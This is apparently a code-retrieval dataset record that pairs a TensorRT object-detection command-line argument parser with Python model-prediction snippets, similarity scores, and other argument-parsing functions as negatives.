self._set_shape(image, gt_heatmaps, gt_lms)\n\n return image, gt_heatmaps, gt_lms, scale, marked", "def predict(self, frame: np.ndarray, bboxes: np.ndarray) -> \\\n Tuple[np.ndarray, np.ndarray, np.ndarray]:\n assert isinstance(frame, np.ndarray)\n assert isinstance(bboxes, np.ndarray)\n detected_bboxes = bboxes.copy()\n if bboxes.size != 0:\n return self.detector.predict(frame, detected_bboxes)\n keypoints = np.array([])\n keypoint_scores = np.array([])\n keypoint_conns = np.array([])\n\n return keypoints, keypoint_scores, keypoint_conns", "def _get_predictions(self, line: List[str]):\n example = self.tokenizer.encode_plus(\n [c for c in line],\n return_token_type_ids=True,\n return_attention_mask=True,\n return_tensors=\"pt\",\n )\n example = {k: v.to(self.device) for k, v in example.items()}\n prediction = self.model(example, training=False)[0]\n prediction = self.softmax_fn(prediction).cpu().data.numpy()\n prediction = prediction[1:-1, 1:].argmax(axis=-1)\n return prediction", "def predict_api():\n data = request.get_json()\n dataset = 
pd.DataFrame(data, index=[0, ])\n new_df = preprocess(dataset)\n\n print(type(new_df))\n if isinstance(new_df, str):\n\n return \"Error!\"\n else:\n\n result = predict(new_df)\n return jsonify(result)", "def predict(self, load_script=False, variant=\"predict\"):\n \n # Interpret the request data based on the expected row and column structure\n row_template = ['strData', 'strData']\n col_headers = ['model_name', 'n_features']\n feature_col_num = 1\n \n # An additional key field column is expected if the call is made through the load script\n if load_script:\n row_template = ['strData', 'strData', 'strData']\n col_headers = ['model_name', 'key', 'n_features']\n feature_col_num = 2\n \n # Create a Pandas Data Frame for the request data\n self.request_df = utils.request_df(self.request, row_template, col_headers)\n \n # Initialize the persistent model\n self.model = PersistentModel()\n \n # Get the model name from the request dataframe\n self.model.name = self.request_df.loc[0, 'model_name']\n \n # Get the model from cache or disk\n self._get_model()\n \n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(3)\n \n if load_script:\n # Set the key column as the index\n self.request_df.set_index(\"key\", drop=False, inplace=True)\n \n try:\n # Split the features provided as a string into individual columns\n self.X = pd.DataFrame([x[feature_col_num].split(\"|\") for x in self.request_df.values.tolist()],\\\n columns=self.model.features_df.loc[:,\"name\"].tolist(),\\\n index=self.request_df.index)\n except AssertionError as ae:\n err = \"The number of input columns do not match feature definitions. Ensure you are using the | delimiter and that the target is not included in your input to the prediction function.\"\n raise AssertionError(err) from ae\n \n # Convert the data types based on feature definitions \n self.X = utils.convert_types(self.X, self.model.features_df, sort=False)\n\n if variant in ('predict_proba', 'predict_log_proba'):\n # If probabilities need to be returned\n if variant == 'predict_proba':\n # Get the predicted probability for each sample \n self.y = self.model.pipe.predict_proba(self.X)\n elif variant == 'predict_log_proba':\n # Get the log probability for each sample\n self.y = self.model.pipe.predict_log_proba(self.X)\n \n # Prepare a list of probability by class for each sample\n probabilities = []\n\n for a in self.y:\n s = \"\"\n i = 0\n for b in a:\n s = s + \", {0}: {1:.3f}\".format(self.model.pipe.named_steps['estimator'].classes_[i], b)\n i = i + 1\n probabilities.append(s[2:])\n \n self.y = probabilities\n \n else:\n # Predict y for X using the previously fit pipeline\n self.y = self.model.pipe.predict(self.X)\n\n # Inverse transformations on the targets if required\n if self.model.scale_target or self.model.make_stationary:\n # Apply the transformer to the test targets\n self.y = self.model.target_transformer.inverse_transform(self.y) \n\n # Prepare the response\n self.response = pd.DataFrame(self.y, columns=[\"result\"], index=self.X.index)\n \n if load_script:\n # Add the key field column to the response\n self.response = self.request_df.join(self.response).drop(['n_features'], axis=1)\n \n # If the function was called through the load script we return a Data Frame\n self._send_table_description(\"predict\")\n \n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(4)\n \n return self.response\n \n # If the function 
was called through a chart expression we return a Series\n else:\n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(4)\n \n return self.response.loc[:,'result']", "def predict_image(img_tensor: torch.Tensor) -> Tuple[str, str]:\n surface_pred, smoothness_pred = MODEL(img_tensor)\n\n surface_id = surface_pred.argmax(axis=1).item()\n smoothness_id = smoothness_pred.argmax(axis=1).item()\n\n surface_string = StreetImageDataset.get_surface_by_id(surface_id)\n smoothness_string = StreetImageDataset.get_smoothness_by_id(smoothness_id)\n\n return smoothness_string, surface_string", "def predict_single_fold(self, model: TorchBasedLinearEstimator, dataset: TabularDataset) -> np.ndarray:\n pred = model.predict(dataset.data)\n\n return pred", "def _build_predictor(self):\n try: \n predict_fn = tf.contrib.predictor.from_saved_model(self.saved_path)\n except OSError as err: \n print(f\"OSError: {err}\")\n self._predict_fn = predict_fn", "def predict(self,text):\n\n text= \"[CLS] \" + text + \" [SEP]\"\n tokenized_text = self.tokenizer.tokenize(text)\n indexed_tokens = self.tokenizer.convert_tokens_to_ids(tokenized_text)\n masked_index = tokenized_text.index('[MASK]') \n\n # Create the segments tensors.\n segments_ids = [0] * len(tokenized_text)\n \n # Convert inputs to PyTorch tensors\n tokens_tensor = torch.tensor([indexed_tokens])\n segments_tensors = torch.tensor([segments_ids])\n \n self.model.eval()\n \n # Predict all tokens\n with torch.no_grad():\n predictions = self.model(tokens_tensor, segments_tensors)\n \n predicted_index = torch.argmax(predictions[0][0][masked_index]).item()\n predicted_token = self.tokenizer.convert_ids_to_tokens([predicted_index])[0]\n \n print(predicted_token)", "def _parse(serialized_example):\n\n feature_map = {\n 'dayofweek': tf.io.FixedLenFeature([], tf.int64),\n 'dropofflat': tf.io.FixedLenFeature([], tf.float32),\n 'dropofflon': tf.io.FixedLenFeature([], tf.float32),\n 'fare_amount': tf.io.FixedLenFeature([], tf.float32),\n 'hourofday': tf.io.FixedLenFeature([], tf.int64),\n 'passengers': tf.io.FixedLenFeature([], tf.float32),\n 'pickuplat': tf.io.FixedLenFeature([], tf.float32),\n 'pickuplon': tf.io.FixedLenFeature([], tf.float32)\n }\n\n # Parse the serialized data into a dictionary.\n parsed_example = tf.io.parse_single_example(\n serialized=serialized_example,\n features=feature_map)\n\n features = add_engineered(parsed_example)\n label = features.pop(\"fare_amount\")\n\n return features, label", "def read_model_and_predict(text):\n try:\n global loaded_model\n new_positive_tweets = pd.Series(text)\n tc = text_count.TextCount()\n ct = clean_text.CleanText()\n df_counts_pos = tc.transform(new_positive_tweets)\n df_clean_pos = ct.transform(new_positive_tweets)\n df_model_pos = df_counts_pos\n df_model_pos['clean_text'] = df_clean_pos\n print(\"Predicting from the loaded pickled model...\")\n return loaded_model.predict(df_model_pos).tolist()\n except RuntimeError as e:\n pass\n finally:\n #################################################################\n # This statement required to try using less memory while running#\n #################################################################\n del loaded_model", "def _decode_record(record, name_to_features):\n example = tf.parse_single_example(record, name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if 
t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n\n return example[\"src_ids\"].values, example[\"tgt_ids\"].values, example[\"label\"][0]", "def predict(self, image_array):\n probabilities = self.model.predict(image_array, verbose=0)\n prediction = int(np.argmax(probabilities))\n return {'prediction': prediction, 'probabilities': probabilities.tolist()[0]}", "def prediction(self, x):\n t = self.model.predict(x)\n return t", "def predict(self, to_predict):\n\t\treturn self.model.predict(to_predict)", "def prediction_prob(self):\n return self.a[np.arange(self.a.shape[0]), self.prediction]", "def process_prediction():\n try:\n input = np.array(request.json, dtype=np.float32)\n prediction = predictor.predict(input).numpy().tolist()\n return jsonify(result=prediction, status=\"Prediction succeeded\")\n except Exception as err:\n return jsonify(result=None, status=f\"Prediction failed: {err}\")", "def extract_predictions(dataset):\n return dataset.Prediction.apply(lambda x: -1 if x == 'b' else 1)", "def prediction():\n # retweets_only = request.args.get('retweets_only')\n # api.set_retweet_checking(strtobool(retweets_only.lower()))\n # with_sentiment = request.args.get('with_sentiment')\n # api.set_with_sentiment(strtobool(with_sentiment.lower()))\n # query = request.args.get('query')\n # api.set_query(query)\n\n # tweets = api.get_tweets()\n perdiction = api.get_perdiction()\n\n return perdiction", "def predict_single(self, data, version='default'):\n if self.transform_service:\n data = self.transform_service.predict_single(data, version)\n return self.model_service.predict_single(data, version)", "def predict(self, image):\n\n if self.__preprocess != None:\n image = self.__preprocess(image)\n\n result = self.__model.predict(image)\n\n if self.__postprocess != None:\n result = self.__postprocess(result)\n\n return result", "def predict(self, input):\n self._check_predict_ready()\n with torch.no_grad():\n self.eval()\n input = deep_to(input, self.device)\n prediction = self.nn_module(input)\n prediction = self.prediction_transform(prediction)\n return prediction", "def deserialize_inference_result(results_b64):\n bytes_io = io.BytesIO(base64.b64decode(results_b64))\n single_pred_dict = dict(np.load(bytes_io))\n if len(single_pred_dict) != 1:\n raise ValueError('Expected exactly one object in the structured np array. 
'\n f'Saw {len(single_pred_dict)}')\n sequence_name = list(single_pred_dict.keys())[0]\n activations = list(single_pred_dict.values())[0]\n return sequence_name, activations", "def predict(model, img, target_size=(229, 229)): #fixed size for InceptionV3 architecture\r\n if img.size != target_size:\r\n img = img.resize(target_size)\r\n\r\n x = image.img_to_array(img)\r\n x = np.expand_dims(x, axis=0)\r\n x = preprocess_input(x)\r\n preds = model.predict(x)\r\n return preds[0]", "def get_prediction(engineered_set, data):\n clf = pickle.load(open(\"Decisiontreemodel_3months.pkl\", \"rb\"))\n try:\n predicted = clf.predict_proba(engineered_set)[:, 1]\n return predicted[0]\n except:\n sendErrorReport(data, \"error2\")\n return 0.9209 # value is not used", "def predict(self, data):\n olen = ctypes.c_uint()\n if isinstance(data, DataIter):\n data.check_valid()\n ret = cxnlib.CXNNetPredictIter(self.handle,\n data.handle,\n ctypes.byref(olen));\n elif isinstance(data, numpy.ndarray):\n if data.ndim != 4:\n raise Exception('need 4 dimensional tensor to use predict')\n\n ret = cxnlib.CXNNetPredictBatch(self.handle,\n data.ctypes.data_as(ctypes.POINTER(ctypes.c_float)),\n shape2ctypes(data),\n ctypes.byref(olen));\n return ctypes2numpy(ret, olen.value, 'float32')", "def predict(self, image_file):\n image = misc.imread(image_file)\n return self.predict_from_ndarray(image)", "def predict(self, eval_dataloader, num_gpus=None, verbose=True):\n\n preds = list(\n super().predict(\n eval_dataloader=eval_dataloader,\n get_inputs=TokenClassificationProcessor.get_inputs,\n n_gpu=num_gpus,\n verbose=verbose,\n )\n )\n preds_np = np.concatenate(preds)\n return preds_np", "def _get_predictions(self, line: str):\n example = DatasetLSTM.process_text(line, self.model_max_length, pad=False)\n example = [DatasetLSTM.encode_sequence(e, self.vocab) for e in example]\n example = [torch.tensor(e, device=self.device).unsqueeze(0) for e in example]\n prediction = self.model(example, training=False)[0]\n prediction = self.softmax_fn(prediction).cpu().data.numpy()\n prediction = prediction[:, 1:].argmax(axis=-1)\n return prediction", "def predict():\n data = request.json\n\n if data:\n predict = bool(data[\"predict\"])\n\n if predict:\n if predictor.pred_dict[\"model\"] == 0:\n # ARIMA\n arima_forecast = predictor.get_prediction_arima()\n plots.arima_df = arima_forecast\n elif predictor.pred_dict[\"model\"] == 1:\n # Prophet\n prophet_forecast = predictor.get_prediction_prophet()\n plots.prophet_df = prophet_forecast\n elif predictor.pred_dict[\"model\"] == 2:\n # LSTM\n lstm_forecast = predictor.get_prediction_bidirectlstm()\n plots.lstm_df = lstm_forecast\n else:\n pass\n\n return 'Non tam praeclarum est scire latine, quam turpe nescire'", "def predict():\n\n if request.is_json:\n req = request.get_json(force=True)\n df = pd.read_json(req, orient='records')\n return pd.DataFrame(clf_loaded.predict(df).round()).to_json(orient='records')", "def post(self):\n result = {'status': 'error'}\n\n args = input_parser.parse_args()\n input_data = args['image'].read()\n image = self.model_wrapper._read_image(input_data)\n preds = self.model_wrapper._predict(image)\n\n # Modify this code if the schema is changed\n label_preds = [{'label_id': p[0], 'label': p[1], 'probability': p[2]} for p in [x for x in preds]]\n result['predictions'] = label_preds\n result['status'] = 'ok'\n\n return result", "def predict(self, request):\r\n f = request.files['image']\r\n \r\n img = Image.open(f)\r\n \r\n image = img.convert('RGB')\r\n \r\n image_np = 
load_image_into_numpy_array(image)\r\n output_dict = run_inference_for_single_image(model, image_np)\r\n vis_util.visualize_boxes_and_labels_on_image_array(\r\n image_np,\r\n output_dict['detection_boxes'],\r\n output_dict['detection_classes'],\r\n output_dict['detection_scores'],\r\n category_index,\r\n instance_masks=output_dict.get('detection_masks_reframed', None),\r\n use_normalized_coordinates=True,\r\n line_thickness=2, \r\n min_score_thresh=0.45, \r\n skip_scores=True)\r\n \r\n result_image = Image.fromarray(image_np)\r\n \r\n raw_bytes = BytesIO()\r\n result_image.save(raw_bytes, \"PNG\")\r\n \r\n return base64.b64encode(raw_bytes.getvalue()).decode(\"utf-8\")", "def predict(self, timestamp, amountOfJobs):\n result = self.model.run({\n \"timestamp\": timestamp,\n self.fieldToPredict: float(amountOfJobs)\n })\n result.metrics = self.metricsManager.update(result)\n\n prediction = float(result.inferences[\"multiStepBestPredictions\"][self.steps])\n\n return prediction", "def prediction(self, x):\n if len(x.shape)==1:\n x = np.reshape(x, (1, x.shape[0]))\n return self.model.predict(x)", "def predict(self, image):\n if len(image.shape) == 3:\n return self._predict_single(image)\n elif len(image.shape) == 4:\n return self._predict_batch(image)\n else:\n raise ValueError('Wrong image format.')", "def decode_predictions(preds, top=5):\n global CLASS_INDEX\n if len(preds.shape) != 2 or preds.shape[1] != 1000:\n raise ValueError('`decode_predictions` expects '\n 'a batch of predictions '\n '(i.e. a 2D array of shape (samples, 1000)). '\n 'Found array with shape: ' + str(preds.shape))\n if CLASS_INDEX is None:\n fpath = get_file('imagenet_class_index.json',\n CLASS_INDEX_PATH,\n cache_subdir='models')\n CLASS_INDEX = json.load(open(fpath))\n results = []\n for pred in preds:\n top_indices = pred.argsort()[-top:][::-1]\n result = [tuple(CLASS_INDEX[str(i)]) + (pred[i],) for i in top_indices]\n result.sort(key=lambda x: x[2], reverse=True)\n results.append(result)\n return results", "def predict(image_path):\n img = image.load_img(image_path, target_size=image_size)\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n predictions = model.predict(x)\n plt.imshow(img)\n print('Predicted:', decode_predictions(predictions, top=1)[0])\n return decode_predictions(predictions, top=1)[0]", "def predict(self, X):\n Y = self.model.predict(X)\n return Y[0][0]", "def predict(self, x_pred):\n self.current_working_memory *= 0 # Flush the current input\n x_pred = np.array(x_pred)\n input_number_samples, input_feature_dimension = x_pred.shape\n if len(x_pred.shape) is not 2:\n print \"Error in predict. 
Input dimension should be 2\"\n raise ValueError\n self.current_working_memory[:input_number_samples, :input_feature_dimension] = x_pred\n for classifier_i in self.classifiers_list:\n predicted_value = classifier_i.predict(self.current_working_memory)\n predicted_shape = predicted_value.shape\n if len(predicted_shape) < 2:\n predicted_value = predicted_value.reshape(-1, 1)\n predicted_shape = predicted_value.shape\n self.current_working_memory[:predicted_shape[0], classifier_i.out_address] = predicted_value\n # need to return the rightmost nonzero column.\n for column_j in range(self.current_working_memory.shape[1])[::-1]: # reverse traverse through columns\n if np.any(self.current_working_memory[:input_number_samples, column_j]):\n soft_dec = self.current_working_memory[:input_number_samples, column_j]\n return np.array(soft_dec > 0.5, dtype=np.int16)\n print 'Cant find any nonzero column'\n return self.current_working_memory[:, 0]" ]
[ "0.55769396", "0.5293517", "0.52770144", "0.5273354", "0.5251776", "0.52444863", "0.522911", "0.51298296", "0.507966", "0.5062503", "0.50453293", "0.5021716", "0.5021298", "0.5006652", "0.5005181", "0.50023496", "0.49902007", "0.49683675", "0.4965189", "0.4964087", "0.49365512", "0.49313185", "0.49211395", "0.49162862", "0.49092662", "0.48989698", "0.48897567", "0.48854995", "0.48840037", "0.48748192", "0.48636553", "0.48584622", "0.48545465", "0.48517632", "0.48447734", "0.48442063", "0.48427325", "0.48402858", "0.48395592", "0.48388475", "0.48368567", "0.48355502", "0.48308834", "0.4830378", "0.48298448", "0.48283207", "0.48228168", "0.48210016", "0.48209006", "0.48201957", "0.4818546", "0.48160002", "0.48160002", "0.48160002", "0.48153126", "0.48079386", "0.48074195", "0.47909915", "0.4779338", "0.4770139", "0.47597545", "0.4759126", "0.47555435", "0.47519493", "0.47503898", "0.47486544", "0.47485968", "0.4747359", "0.4731805", "0.47308287", "0.47307628", "0.47294736", "0.47266552", "0.47232762", "0.47227854", "0.4718179", "0.4707063", "0.47058356", "0.47000176", "0.46961787", "0.46920326", "0.46907297", "0.46896574", "0.4688409", "0.46872538", "0.46859547", "0.46830767", "0.46752533", "0.46749762", "0.46746412", "0.46742675", "0.46660075", "0.46631652", "0.4660525", "0.46579346", "0.46576855", "0.4653589", "0.46527925", "0.46519813", "0.46502063" ]
0.7810624
0
Parses command line arguments and adjusts internal data structures.
def parse_commandline_arguments(): # Define script command line arguments parser = argparse.ArgumentParser(description='Run object detection inference on input image.') parser.add_argument('input_img_path', metavar='INPUT_IMG_PATH', help='an image file to run inference on') parser.add_argument('-p', '--precision', type=int, choices=[32, 16], default=32, help='desired TensorRT float precision to build an engine with') parser.add_argument('-b', '--max_batch_size', type=int, default=1, help='max TensorRT engine batch size') parser.add_argument('-w', '--workspace_dir', help='sample workspace directory') parser.add_argument('-fc', '--flatten_concat', help='path of built FlattenConcat plugin') # Parse arguments passed args = parser.parse_args() # Set FlattenConcat TRT plugin path and # workspace dir path if passed by user if args.flatten_concat: PATHS.set_flatten_concat_plugin_path(args.flatten_concat) if args.workspace_dir: PATHS.set_workspace_dir_path(args.workspace_dir) if not os.path.exists(PATHS.get_workspace_dir_path()): os.makedirs(PATHS.get_workspace_dir_path()) # Verify Paths after adjustments. This also exits script if verification fails PATHS.verify_all_paths() # Fetch TensorRT engine path and datatype trt_engine_datatype = TRT_PRECISION_TO_DATATYPE[args.precision] trt_engine_path = PATHS.get_engine_path(trt_engine_datatype, args.max_batch_size) if not os.path.exists(os.path.dirname(trt_engine_path)): os.makedirs(os.path.dirname(trt_engine_path)) parsed = { 'input_img_path': args.input_img_path, 'max_batch_size': args.max_batch_size, 'trt_engine_datatype': trt_engine_datatype, 'trt_engine_path': trt_engine_path } return parsed
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse_arguments(self):\n \n for arg in sys.argv[1:]:\n (key, sep, value) = arg.partition(\"=\")\n if sep != \"=\":\n raise ProcessorError(\"Illegal argument '%s'\" % arg)\n self.update_data(key, value)", "def parse_arguments(args):", "def __parse_args(self):\n for argument in self.args:\n source_arg = re.match(\"^(--source=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n input_arg = re.match(\"^(--input=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n stats_arg = re.match(\"^(--stats=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n help_arg = re.match(\"^--help$\", argument)\n vars_arg = re.match(\"^--vars$\", argument)\n insts_arg = re.match(\"^--insts$\", argument)\n if source_arg:\n self.sourceFile = source_arg.group(2)\n self.passedArgs.append(\"source\")\n elif input_arg:\n self.inputFile = input_arg.group(2)\n self.passedArgs.append(\"input\")\n elif help_arg:\n print(\"napoveda\")\n sys.exit(0)\n elif stats_arg:\n self.statsFile = stats_arg.group(2)\n self.passedArgs.append(\"stats\")\n elif vars_arg:\n self.passedArgs.append(\"vars\")\n if self.first_stat_arg is None:\n self.first_stat_arg = \"vars\"\n elif insts_arg:\n self.passedArgs.append(\"insts\")\n if self.first_stat_arg is None:\n self.first_stat_arg = \"insts\"\n else:\n raise ArgError(\"Unknown argument or format of the argument! (\" + argument + \")\")", "def process_command_line_arguments() -> Namespace:\n\n parser = build_parser()\n arguments = parser.parse_args()\n\n return arguments", "def update_args(self, args):\n self.args = self.parser.parse_args(args)", "def _parse_args(self):\n parser = argparse.ArgumentParser()\n _, args = parser.parse_known_args()\n self.args = [a for a in args if a != '']", "def parse_args(self, argv=None):\n self.opts, self.args = self.cli_parser.parse_args(argv)\n self._begin_logging()\n if argv is None:\n argv = sys.argv\n logger.info(' '.join(argv))\n self._process_input_files()\n self._construct_links_of_interest()\n self._open_output_files()\n data = self._construct_data_struct()\n return data", "def parseArguments():\n # Create argument parser\n parser = argparse.ArgumentParser()\n\n # Optional arguments\n parser.add_argument(\"-t\", \"--test\", help=\"Optionally test algorithm on subsample of the data. Set to 1 for testing\", type=int, default=0)\n\n parser.add_argument(\"--cores\", help=\"Optimized code for a server with a lot of RAM, set to the number of available cores\", type=int, default=40)\n\n\n # Print version\n parser.add_argument(\"--version\", action=\"version\", version='%(prog)s - Version 2.0') #version 1.0 is for the observations in June 2018\n #version 1.1 contains the optimizations made after the june observations (mainly the switch to stackmags)\n #version 1.2 changed sim class to NOT include the list of failed candidates (not qsos)\n #... 
copied changes made to crossval version\n #version 1.5 added check for duplicate quasars and remove them\n #version 1.6 new simulated quasars (december)\n ##-------------------\n #version 2.0: combined training of classifier and regressor, streamlined input\n #version 2.1: Tryied to updates excluded area to a little more than stripe 82 but decided not to keep it, so no change\n\n # Parse arguments\n args = parser.parse_args()\n\n return args", "def _parse_args(self, prepared_args):\n pass", "def main():\n args = parse_args()\n process_args(args)", "def parse_arguments():\n ## Initialize Parser Object\n parser = argparse.ArgumentParser(description=\"Preprocess raw Twitter or Reddit data\")\n ## Generic Arguments\n parser.add_argument(\"--input\",\n type=str,\n default=None,\n help=\"Path to input folder of raw *.gz files or a single raw *.gz file\")\n parser.add_argument(\"--output_folder\",\n type=str,\n default=None,\n help=\"Name of output folder for placing predictions.\")\n parser.add_argument(\"--platform\",\n type=str,\n choices=[\"twitter\",\"reddit\"],\n help=\"Platform from which the data comes\")\n parser.add_argument(\"--jobs\",\n type=int,\n default=1,\n help=\"Number of processes to spawn.\")\n parser.add_argument(\"--keep_retweets\",\n default=False,\n action=\"store_true\",\n help=\"If included, will preserve retweets in preprocessed data\")\n parser.add_argument(\"--keep_non_english\",\n default=False,\n action=\"store_true\",\n help=\"If included, will preserve non-English tweets in preprocessed data\")\n ## Parse Arguments\n args = parser.parse_args()\n ## Check Arguments\n if args.input is None:\n raise ValueError(\"Must provide --input folder or .gz file\")\n if not os.path.exists(args.input):\n raise FileNotFoundError(f\"Could not find input filepath {args.input}\")\n if args.output_folder is None:\n raise ValueError(\"Must provide an --output_folder argument\")\n if not os.path.exists(args.output_folder):\n os.makedirs(args.output_folder)\n return args", "def parse_arguments():\n\n args = Arguments()\n parser = argparse.ArgumentParser(\"Update river flow directions\")\n parser.add_argument('python_config_filename',\n metavar='python-config-filename',\n help='Full path to python configuration file',\n type=str)\n #Adding the variables to a namespace other than that of the parser keeps the namespace clean\n #and allows us to pass it directly to main\n parser.parse_args(namespace=args)\n return args", "def parse_args():\n global Args\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers()\n pars_simulation(subparsers)\n pars_analyze(subparsers)\n Args = parser.parse_args()", "def parse_args(self):\n #-----------------------------------------------------------------------\n #This code is based on code from the KR Toolkit by Christian Muise\n #URL: http://code.google.com/p/krtoolkit/\n try:\n argv, opts, flags = sys.argv[1:], {}, []\n while argv:\n if argv[0][0:2] == '--':\n flags.append(argv[0])\n argv = argv[1:]\n elif argv[0][0] == '-':\n opts[argv[0]] = argv[1]\n argv = argv[2:]\n else:\n raise InputException(\"Badly constructed arg: \" +argv[0])\n except IndexError:\n raise InputException(\"Badly constructed arg: \" + argv[0])\n #-----------------------------------------------------------------------\n for flag in flags:\n if flag in self.program_flags:\n vars(self)[self.program_flags[flag].var_name] = True\n if self.program_flags[flag].function:\n self.program_flags[flag].function(self)\n else:\n raise InputException(\"Invalid flag: \" + flag)\n 
\n if not self.quiet:\n min_width = max(len('Flags:'),\n max(map(lambda x : len(x.description),\n self.program_args.itervalues()))) + 1\n if len(flags) == 0:\n print \"{:<{}} {}\".format('Flags:', min_width,'<None>')\n else:\n print \"{:<{}} {}\".format('Flags:', min_width,\n ', '.join(filter(lambda f : f in flags,\n self.program_flags)))\n \n for arg in opts:\n if arg not in self.program_args:\n raise InputException(\"Invalid arg: \" + arg)\n \n for arg in self.program_arg_order:\n arg_def = self.program_args[arg]\n if arg not in opts:\n if arg_def.needed:\n raise InputException(\"Error needed arg is missing: \" + arg)\n vars(self)[arg_def.var_name] = arg_def.default_value\n else:\n if arg_def.validator == None:\n vars(self)[arg_def.var_name] = opts[arg]\n else:\n vars(self)[arg_def.var_name] = arg_def.validator(opts[arg],\n arg_def.validator_args)\n if not self.quiet:\n print \"{:<{}} {}\".format(arg_def.description + ':', min_width,\n vars(self)[arg_def.var_name])", "def ReadArguments():\n\n args = ParseArguments()\n\n logging.info('Command line arguments...')\n for arg in vars(args):\n logging.info(str(arg) + ': ' + str(getattr(args, arg)))\n logging.info('')\n\n IsTest(args)\n ProcessCacheSize(args)\n ProcessLineSize(args)\n ProcessMulti(args)\n ProcessMemPattern(args)\n ProcessMemFile(args)", "def setup_args(cls) -> ParlaiParser:\n # we want to later deprecate this for add_cmdline_args", "def parse_args():\n parser = argparse.ArgumentParser('Reading Comprehension on BaiduRC dataset')\n parser.add_argument('--prepare', action='store_true',\n help='create the directories, prepare the vocabulary and embeddings')\n parser.add_argument('--train', action='store_true',\n help='train the model')\n parser.add_argument('--generate', action='store_true',\n help='predict the answers for test set with trained model')\n parser.add_argument('--gentest', action='store_true',\n help='predict the answers for test set with trained model')\n parser.add_argument('--gpu', type=str, default='0',\n help='specify gpu device')\n\n train_settings = parser.add_argument_group('train settings')\n train_settings.add_argument('--optim', default='Adam',\n help='optimizer type')\n train_settings.add_argument('--learning_rate', type=float, default=0.001,\n help='learning rate')\n train_settings.add_argument('--weight_decay', type=float, default=0,\n help='weight decay')\n train_settings.add_argument('--dropout', type=float, default=0,\n help='dropout keep rate')\n train_settings.add_argument('--batch_size', type=int, default=128,\n help='train batch size')\n train_settings.add_argument('--epochs', type=int, default=10,\n help='train epochs')\n\n model_settings = parser.add_argument_group('model settings')\n model_settings.add_argument('--embed_size', type=int, default=128,\n help='size of the embeddings')\n model_settings.add_argument('--hidden_size', type=int, default=256,\n help='size of LSTM hidden units')\n model_settings.add_argument('--max_seq_len', type=int, default=50,\n help='max passage num in one sample')\n model_settings.add_argument('--max_gen_len', type=int, default=50,\n help='max length of passage')\n\n path_settings = parser.add_argument_group('path settings')\n path_settings.add_argument('--vocab_dir', default='../data/vocab/',\n help='the dir to save vocabulary')\n path_settings.add_argument('--model_dir', default='../data/models/',\n help='the dir to store models')\n path_settings.add_argument('--result_dir', default='../data/results/',\n help='the dir to output the results')\n 
path_settings.add_argument('--summary_dir', default='../data/summary/',\n help='the dir to write tensorboard summary')\n path_settings.add_argument('--log_path',\n help='path of the log file. If not set, logs are printed to console')\n return parser.parse_args()", "def ParseArguments():\n\t#TODO: check input variable types!\n\t# check for integers ans strings\n\t# check for distance and distance cutoff value: ONLY CERTAIN VALUES ALLOWED\n\targ_parser = argparse.ArgumentParser(description=\"Program to get background distribution matching user input SNPs on the following parameters {MAF, distance to nearest gene, gene density}\")\n\tsubparsers = arg_parser.add_subparsers(dest='subcommand',\n\t\t\t\t\t\t\t\t\t title='subcommands in this script',\n\t\t\t\t\t\t\t\t\t description='valid subcommands. set subcommand after main program required arguments',\n\t\t\t\t\t\t\t\t\t help='You can get additional help by writing <program-name> <subcommand> --help')\n\n\t## Subparsers\n\targ_parser_annotate = subparsers.add_parser('annotate')\n\t#arg_parser_annotate.set_defaults(func=run_annotate)\n\targ_parser_match = subparsers.add_parser('match')\n\t#arg_parser_annotate.set_defaults(func=run_match)\n\n\n\targ_parser.add_argument(\"--user_snps_file\", help=\"Path to file with user-defined SNPs\", required=True) # TODO: make the program read from STDIN via '-'\n\targ_parser.add_argument(\"--output_dir\", help=\"Directory in which output files, i.e. random SNPs will be written\", required=True)\n\t#arg_parser.add_argument(\"--output_dir\", type=ArgparseAdditionalUtils.check_if_writable, help=\"Directory in which output files, i.e. random SNPs will be written\", required=True)\n\targ_parser.add_argument(\"--distance_type\", help=\"ld or kb\", required=True)\n\targ_parser.add_argument(\"--distance_cutoff\", help=\"r2, or kb distance\", required=True)\n\t# NEW: options\n\t#arg_parser.add_argument(\"--status_file\", help=\"Bool (switch, takes no value after argument); if set then logging is ENABLED.\", action='store_true')\n\t#arg_parser.add_argument(\"--status_file\", help=\"If set, a json file will be written. Value should be the a filepath.\")\n\targ_parser.add_argument(\"--web\", help=\"If set, the program will run in web mode. VALUE should be the a filepath to output (temporary) file - usually this will be the session_id. The web mode activates: 1) creating a status_obj and writing it to json file; 2) ENABLE writing a json report file;\")\n\targ_parser.add_argument(\"--NoLogger\", help=\"Bool (switch, takes no value after argument); if set then logging is DISAPLED. 
Logfile will be placed in outputdir.\", action='store_true')\n\n\n\t### MATCH arguments\n\targ_parser_match.add_argument(\"--N_sample_sets\", type=int, help=\"Number of matched SNPs to retrieve\", required=True) # 1000 - \"Permutations?\" TODO: change name to --n_random_snp_sets or --N\n\t#TODO: add argument that describes if ABSOLUTE of PERCENTAGE deviation should be used\n\targ_parser_match.add_argument(\"--max_freq_deviation\", type=int,help=\"Maximal deviation of SNP MAF bin [MAF +/- deviation]\", default=5) # 5\n\targ_parser_match.add_argument(\"--max_distance_deviation\", type=int, help=\"Maximal PERCENTAGE POINT deviation of distance to nearest gene [distance +/- %%deviation])\", default=5) # 20000\n\t#TODO: CHECK THAT max_distance_deviation > 1 %\n\t#TODO: WHY IS max_genes_count_deviation type float!!!!????\n\targ_parser_match.add_argument(\"--max_genes_count_deviation\", type=float, help=\"Maximal PERCENTAGE POINT deviation of genes in locus [gene_density +/- %%deviation]\", default=5) # 0.2\n\targ_parser_match.add_argument(\"--set_file\", help=\"Bool (switch, takes no value after argument); if set then write out set files to rand_set..gz. Default is false\", action='store_true')\n\n\targs = arg_parser.parse_args()\n\n\treturn args", "def parse_arguments():\n 